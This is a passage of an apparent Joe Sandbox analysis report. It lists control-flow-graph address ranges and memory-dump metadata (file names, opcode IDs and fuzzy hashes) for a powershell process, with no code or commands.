                        control_flow_graph 315 7ff848f516c9-7ff848f51751 324 7ff848f51754-7ff848f51765 315->324 325 7ff848f51753 315->325 326 7ff848f51768-7ff848f517f4 324->326 327 7ff848f51767 324->327 325->324 331 7ff848f51919-7ff848f519c9 326->331 332 7ff848f517fa-7ff848f51804 326->332 327->326 369 7ff848f519cc-7ff848f519dd 331->369 370 7ff848f519cb 331->370 333 7ff848f5181d-7ff848f51822 332->333 334 7ff848f51806-7ff848f51813 332->334 336 7ff848f51828-7ff848f5182b 333->336 337 7ff848f518ba-7ff848f518c4 333->337 334->333 341 7ff848f51815-7ff848f5181b 334->341 336->337 342 7ff848f51831-7ff848f51834 336->342 339 7ff848f518c6-7ff848f518d2 337->339 340 7ff848f518d3-7ff848f51916 337->340 340->331 341->333 345 7ff848f5185b 342->345 346 7ff848f51836-7ff848f5184a 342->346 349 7ff848f5185d-7ff848f5185f 345->349 356 7ff848f5184c-7ff848f51859 346->356 349->337 352 7ff848f51861-7ff848f5186b 349->352 352->337 360 7ff848f5186d-7ff848f5187b 352->360 356->349 360->356 363 7ff848f5187d-7ff848f51883 360->363 365 7ff848f5188a-7ff848f51893 363->365 367 7ff848f518ac-7ff848f518b9 365->367 368 7ff848f51895-7ff848f518a2 365->368 368->367 374 7ff848f518a4-7ff848f518aa 368->374 372 7ff848f519df 369->372 373 7ff848f519e0-7ff848f51a7a 369->373 370->369 372->373 378 7ff848f51a80-7ff848f51a8a 373->378 379 7ff848f51bc2-7ff848f51c8b 373->379 374->367 380 7ff848f51a8c-7ff848f51aa1 378->380 381 7ff848f51aa3-7ff848f51aa8 378->381 380->381 383 7ff848f51aae-7ff848f51ab1 381->383 384 7ff848f51b62-7ff848f51b6c 381->384 386 7ff848f51af6 383->386 387 7ff848f51ab3-7ff848f51ac2 383->387 388 7ff848f51b7d-7ff848f51bbf 384->388 389 7ff848f51b6e-7ff848f51b7c 384->389 393 7ff848f51af8-7ff848f51afa 386->393 387->379 399 7ff848f51ac8-7ff848f51ad2 387->399 388->379 393->384 394 7ff848f51afc-7ff848f51b02 393->394 396 7ff848f51b04-7ff848f51b1f 394->396 397 7ff848f51b21-7ff848f51b34 394->397 396->397 410 7ff848f51b4d-7ff848f51b61 397->410 411 7ff848f51b36-7ff848f51b43 397->411 402 7ff848f51aeb-7ff848f51af4 399->402 403 7ff848f51ad4-7ff848f51ae9 399->403 402->393 403->402 411->410 414 7ff848f51b45-7ff848f51b4b 411->414 414->410
                        Memory Dump Source
                        • Source File: 00000003.00000002.3385752258.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7ff848f50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c08f7ecef1ac383fc1a68c18a04d0f3238100a3c0e9c71a4f53ff9398044dd8
                        • Instruction ID: 7819489cb506016e10057ee04417fa249b23feaef5596e1b4cfe951aed02c204
                        • Opcode Fuzzy Hash: 1c08f7ecef1ac383fc1a68c18a04d0f3238100a3c0e9c71a4f53ff9398044dd8
                        • Instruction Fuzzy Hash: 8561E331D0EBCA5FE366A7281824275ABE1EF46799F1901FBD448C71D3DE086C4A8356
                        Memory Dump Source
                        • Source File: 00000003.00000002.3384780716.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ebc335d854d6cfcdbd6fc7495e1649b7abc61e8e604eee7215e1736a354654af
                        • Instruction ID: 7a39d3285c544b562e1061ef2cc68c8d2c7774a39c98c4d2b5126f0177609ff0
                        • Opcode Fuzzy Hash: ebc335d854d6cfcdbd6fc7495e1649b7abc61e8e604eee7215e1736a354654af
                        • Instruction Fuzzy Hash: EE220670D086198FDB18DF98C4959EDFBB2FF88340F14866DD41AAB286CB34A945CF58